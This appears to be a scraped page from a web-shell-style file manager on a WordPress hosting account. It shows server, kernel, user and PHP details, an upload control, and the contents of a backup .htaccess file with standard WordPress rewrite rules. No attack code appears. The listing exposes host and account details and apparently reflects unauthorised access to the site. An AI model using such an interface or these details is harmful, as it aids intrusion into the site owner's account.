/home/zsqy41wihll2/public_html/wp-content/mu-plugins HEX
HEX
Server: Apache
System: Linux sxb1plzcpnl435969.prod.sxb1.secureserver.net 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
User: zsqy41wihll2 (9243640)
PHP: 7.4.33
Disabled: NONE
Upload Files
File: /home/zsqy41wihll2/public_html/.htaccess-230517123644-6464ca5ce2d83-duplicator.bak
<IfModule mod_rewrite.c>
RewriteEngine Off
</IfModule>

# BEGIN WordPress
# The directives (lines) between "BEGIN WordPress" and "END WordPress" are
# dynamically generated, and should only be modified via WordPress filters.
# Any changes to the directives between these markers will be overwritten.
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteRule .* - [E=HTTP_AUTHORIZATION:%{HTTP:Authorization}]
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>

# END WordPress